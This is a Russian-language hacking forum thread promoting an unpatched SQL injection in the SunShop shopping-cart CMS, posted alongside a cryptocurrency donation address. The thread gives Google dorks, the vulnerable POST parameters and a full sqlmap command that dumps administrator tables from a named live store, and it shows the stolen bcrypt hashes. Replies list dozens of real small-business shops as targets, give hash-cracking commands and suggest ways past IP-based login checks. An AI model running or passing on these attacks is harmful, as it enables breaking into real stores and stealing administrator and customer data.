[LVL 1] 1337 H4k GAME

[FantasticExploits]

* intro

Было приятно читать прошлый топик, очень жаль, что ни кто кому было интересно найти мои контакты не догадался расшифровать сообщение в подписи. Я принял для себя решение, пусть мы не собрали в прошлом топике ту сумму на которую я расчитывал , а с моей пропажей переводы вообще остановились, я все равно продолжу и постараюсь сделать публикацию подобных постов ежегодным. Сегодня я хочу рассказать об уязвимости которой удавалось оставатся в тайне 10 лет и оставалась такой по сей день.


* CMS


Достаточно популярная CMS - есть процессинги. Платный движек, минимум шопов без ордеров.

exploit-db.com - последний баг датирован 2008 годом. SunShop.



* search


Дорки для гугла : "SunShop Login" , Powered by SunShop "Shopping Cart Software"


* 0day


заходим на сайт выбираем товар, меняем параметр размера, смострим в отладку.


Получаем реальное значение поля option (вспоминаем что такое x8). Вообще по большому секрету скажу, что там вообще все поля option во всех скриптах уязвимы к SQLi, стоит лиш добавить им sleep(10);

/index.php?l=addtocart

option[7760]=45541*&option[9041]=53369&product[id]=2691&regid=zLpO&product[quantity]=1

[code/]


Отправляем в sql-map

[code]

sqlmap -u "index.php?l=addtocart" --data="option[7760]=45541*&option[9041]=53369&product[id]=2691&regid=zLpO&product[quantity]=1" --technique=B --dbms=MySQL --batch  --answers=attack?=n,continue?=y --risk=3 --level=2 --time-sec=15 --timeout=100 --text-only --threads=10 -D alexande_alexanderelitefashions -T ss_admins -C username,password --dump --random-agent --threads=10 --sql-shell

Получаем зашифрованные аккаунты администраторов

| alexanderfashions | $2y$10$0red092Yqc./Ln9O4AGmxe65ZU62EbH6ZT1qkiYT2n7fqtW0Uv8Pq |

| twtadmin          | $2y$10$jQ00S0gSsFDILlF/1GB.vOE7y715szkB/RozOpT6v13Q.cORRFJEO |

/admin/ стандартный путь к админке.



в административной панли обращаем внимание на

admin/adminindex.php?action=settings&sub=general

* rce?

mail method - позволяет указать запускаемый скрипт (/usr/sbin/sendmail);

cURL connect - /usr/bin/curl

* Shop Phone Number: etc, позволяют вставить js.

* admin/adminindex.php?action=settings&sub=templates - редактор темплэйтов посзволяет вставить ваш код

Редактор бд смахивает на опенкарт, /admin/adminindex.php?action=settings&sub=backup : )




В этот раз копим 10000$ LTC: ltc1qrm8wlwl7nm04n75ry8f65p9q262g27sulx225z Первый контакт, ПМ. Неделю точно буду на этом аккаунте.

 

[FantasticExploits]

Тишина какая-то, жуть. Понимаю, стало посложнее. Но не до такой-же степени, что-бы совсем не выполнимо.

1.	aheavenlypie.com
2.	alexanderelitefashions.com
3.	allaboutdogsinc.com
4.	arrowtooling.com
5.	bouncers2u.com
6.	boxstockproject.com
7.	canyonlakegunsmithing.com
8.	chefhansgourmetfoods.com
9.	commercialrefrigerationboston.com
10.	commercialrefrigerationlongisland.com
11.	cumingsnets.com
12.	customharleyparts.com
13.	damagedear.com
14.	debscookiesandtreats.com
15.	digitalhippo.com
16.	earleybirdnursery.com
17.	earleybirdsnursery.com
18.	elimia.com
19.	fireequipmentassociates.com
20.	gettinsaltyapparel.com
21.	goodecrowleytheater.org
22.	huskyvape.com
23.	ieputtinggreens.com
24.	jaggedtoothtackle.com
25.	juliasindokitchen.com
26.	khcsports.com
27.	lanmarkalternatives.com
28.	lanmarkwholesale.com
29.	lecturesdefrance.com
30.	lifelineint.com
31.	locustgroveappliance.com
32.	ma-distribution.com
33.	masontackle.com
34.	mddcstore.net
35.	mercarusa.com
36.	motherlinks.com
37.	murrietawebdesigns.com
38.	neworleansgiftstore.com
39.	newporttackle.com
40.	ptavideostore.com
41.	raymondsmarine.com
42.	rebelrails.com
43.	rice2008.com
44.	roofinglosangelesca.org
45.	saltydogapparel.com
46.	seascape-roatan.com
47.	tarocraft.com
48.	ufranks.com
49.	vapinlizards.com
50.	whittiertintshop.com

 

[Ott_Fon_Bismark]

Тишина какая-то, жуть. Понимаю, стало посложнее. Но не до такой-же степени, что-бы совсем не выполнимо.

1.	aheavenlypie.com
2.	alexanderelitefashions.com
3.	allaboutdogsinc.com
4.	arrowtooling.com
5.	bouncers2u.com
6.	boxstockproject.com
7.	canyonlakegunsmithing.com
8.	chefhansgourmetfoods.com
9.	commercialrefrigerationboston.com
10.	commercialrefrigerationlongisland.com
11.	cumingsnets.com
12.	customharleyparts.com
13.	damagedear.com
14.	debscookiesandtreats.com
15.	digitalhippo.com
16.	earleybirdnursery.com
17.	earleybirdsnursery.com
18.	elimia.com
19.	fireequipmentassociates.com
20.	gettinsaltyapparel.com
21.	goodecrowleytheater.org
22.	huskyvape.com
23.	ieputtinggreens.com
24.	jaggedtoothtackle.com
25.	juliasindokitchen.com
26.	khcsports.com
27.	lanmarkalternatives.com
28.	lanmarkwholesale.com
29.	lecturesdefrance.com
30.	lifelineint.com
31.	locustgroveappliance.com
32.	ma-distribution.com
33.	masontackle.com
34.	mddcstore.net
35.	mercarusa.com
36.	motherlinks.com
37.	murrietawebdesigns.com
38.	neworleansgiftstore.com
39.	newporttackle.com
40.	ptavideostore.com
41.	raymondsmarine.com
42.	rebelrails.com
43.	rice2008.com
44.	roofinglosangelesca.org
45.	saltydogapparel.com
46.	seascape-roatan.com
47.	tarocraft.com
48.	ufranks.com
49.	vapinlizards.com
50.	whittiertintshop.com

 

[FantasticExploits]

Скрытое содержимое

https://www.alexanderelitefashions.com/ -> выбираем_любой_товар -> https://www.alexanderelitefashions.com/index.php?l=product_detail&p=1840 -> меняем_размер_например -> получаем опнш, -> добавляем в корзину опять опшн. Там они кругом.
Для простоты ты можешь добавить к запросу SQLMAP - параметр form и он проверит все формы.

 

[amur312]

У меня вопрос, а как декодировать пароль такого вида - retrieved: $2y$10$jQ00S0gSsFDILlF/1GB.vOE7y715szkB/RozOpT6v13Q.cORRFJEO ?

 

[vagabond]

hashcat 3200 вроде

 

[amur312]

hashcat 3200 вроде

благодарю

 

[amur312]

​

Error!​

The IP address you are attempting to login from cannot be verified. Please check your email to approve the login.
Сайты, которые просят айпи скипать?

 

[FantasticExploits]

​

Error!​

The IP address you are attempting to login from cannot be verified. Please check your email to approve the login.
Сайты, которые просят айпи скипать?

| twtadmin | $2y$10$jQ00S0gSsFDILlF/1GB.vOE7y715szkB/RozOpT6v13Q.cORRFJEO | admin
Эта учетная запись есть везде, и везде нужно угадать IP. Попробуй спарсить IP из базы и поискать proxy/vpn из под той-же подсети. Что касается bcrypt. Это не небрутабельный алгоритм, а алгоритм который не сбрутишь на домашнем компьютере так быстро как тебе хотелось бы. Гугли по запросу - аренда GPU ну и как минимум стоит пробовать https://cmd5.com/

 

[buyacc]

У меня вопрос, а как декодировать пароль такого вида - retrieved: $2y$10$jQ00S0gSsFDILlF/1GB.vOE7y715szkB/RozOpT6v13Q.cORRFJEO ?

Это бкрипт вспотеете расшифровывать.

 

[weakem]

такой вопрос к sqlmap как данные от админки то получить

 

[0blako]

такой вопрос к sqlmap как данные от админки то получить

https://www.rebelrails.com/index.php?l=product_detail&p=3715 - а здесь как действовуешь?
{
"product[id]": "3715",
"product[quantity]": "1",
"option[769]": "3464"
}


{
"option[769]": "3467",
"product[id]": "3715",
"regid": "",
"product[quantity]": "1"
}

 

[89t0rIhnt]

Благодарю за статью, надо будет написать сканнер на CMS.

 

[vagabond]

Подкину еще пару целей для практики:

http://pmpress.org

Vegetarian & Vegan Vitamins | Buy Animal-Free Multivitamin Supplements

You can buy Vegetarian/vegan suitable vitamins, supplements and herbs at our store. Strictly vegetarian/vegan vitamin products for healthy vegetarian diets.

www.vegetarianvitamins.com

Jims orchid supplies offers a wide variety of orchid growing supplies,

orchid growing supplies waycool evaporative cooling fans Schaefer greenhouse ventilation equipment,

www.jimssupplies.com

Classic Auto Sound

Australia's most trusted classic car radio specialist. We offer the ultimate in classic car radios that combine period-correct looks with today's technology and features including Bluetooth, DAB+, USB, MP3 Support and more. You won't find generic off-the-shelf radios here, each and every radio...

www.retrosoundusa.com.au

Live Rock n Reef | Wholesale Saltwater Aquarium Live Rock

We offer absolute best live rock available anywhere, Direct from the diver! for the same price the pet stores pay for live rock. Shipping included in many packages.

www.liverocknreef.com

Lifes Great Products-The home of Poop-Off, AUF and Dumb Cat products.

Animal urine formulas, Pet, Automotive, Janitorial & Marine products solving problems related to bird droppings, animal urine, stains, and odors. Treat problems caused by accidents on floors and carpet...the most effective animal urine removers available. We never use human urine formulas that...

lifesgreatproducts.com

Da NeeNa - Exquisite Handmade Professional Showgirl, Theater, and Circus Costumes, Wings, Headdress, Back Pieces. Shipping worldwideProfessional Showgirl Costumes, Theater and Circus Costumes, Wings, Headdress. Shipping worldwide

Da NeeNa provides Inspired Victoria Secret Angel wings, showgirl costumes, samba costumes, showgirl dresses, outfits, Halloween costumes, samba costumes, samba rio costume, feather showgirl headdress, samba costume man men male,drag queen dresses, showgirl headdresses, headpiece, shoulder back...

daneena.com

Alper Motorsports

Alper Motorsports specializes in products for LS1, LS2, LS3 and LS7 motors. alternator brackets, hardware, chromoly heim joints, off road, sand rails, billet alternator brackets, LS1 steering brackets.

alpermotorsports.com

Fortress Audio - audio and video duplication, DVDs, CDs and direct to disc printing

Fortress Audio can supply you with your entire blank and duplicated CD, and DVD media needs. We provide a full range of audio duplication services, direct to disc thermal and color printing, packaging design, printing and shrink-wrapping

fortressaudio.com

Simantech, Inc.

Tersa, tersa knives, martin, aigner , woodworking machinery.

simantechinc.com

Sprintbit Software Store

Sprintbit Software specializes in creating multimedia and utility software for Windows 98, XP, Vista and Windows 7/8/10 . Buy our award-winning file & disk management; file audio processing and lottery analyzing software at Sprintbit.com.Here at Sprintbit Software Store you can buy our award...

www.sprintbit.us

Dental Handpiece USA

Dental Handpiece USA offers Repairs and Sales Dental Handpieces.

dentalhandpieceusa.com

Disconnects of Florida Store

Scrubbies By Chris

Scrubbies are hand crocheted and come in a variety of colors. Best of all, scrubbies clean without using any chemical agent, therefore, allowing you and your family to breath easier.

scrubbies.com

 

[weakem]

https://www.rebelrails.com/index.php?l=product_detail&p=3715 - а здесь как действовуешь?
{
"product[id]": "3715",
"product[quantity]": "1",
"option[769]": "3464"
}


{
"option[769]": "3467",
"product[id]": "3715",
"regid": "",
"product[quantity]": "1"
}

меняй размер, и захватывай через бурп пост запрос

 

[0blako]

меняй размер, и захватывай через бурп пост запрос

web server operating system: Linux CentOS

web application technology: PHP 7.4.33, Apache 2.4.58

back-end DBMS: MySQL >= 5.0.0 (MariaDB fork)

 

[0blako]

DB rebelr_SS4, все таки проблема с хэш. не понимаю как ты дальше работаешь. Т.е у нас есть хэш что дальше, что вообще дальше с этим всем делать? Обьясни, мне интересно, можешь в лс. Очень заинтересовало

 

[FantasticExploits]

DB rebelr_SS4, все таки проблема с хэш. не понимаю как ты дальше работаешь. Т.е у нас есть хэш что дальше, что вообще дальше с этим всем делать? Обьясни, мне интересно, можешь в лс. Очень заинтересовало

Хэши необходимо расшифровывать. В сообщение от @vagabond пояснение по алгоритму.

hashcat -a 0 -m 3200 hashes.txt ./rockyou.txt
john --format=bcrypt --wordlist=rockyou.txt hashes.txt

 

[Kail Battler]

Здравствуйте, спасибо за статью.

Получаем реальное значение поля option (вспоминаем что такое x8).

А можно тут подробнее раскрыть? Что нужно со-значением сделать?

 

[Kail Battler]

Гугли по запросу - аренда GPU ну и как минимум стоит пробовать https://cmd5.com/

На этом сервисе нет bcrypt, нужно другие искать.